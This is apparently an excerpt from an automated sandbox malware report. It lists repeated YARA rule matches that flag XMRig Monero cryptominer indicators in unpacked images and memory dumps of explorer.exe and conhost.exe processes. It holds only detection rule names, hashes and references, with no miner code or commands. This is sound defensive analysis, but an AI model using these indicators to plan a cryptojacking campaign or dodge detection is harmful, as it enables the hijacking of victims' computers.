Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
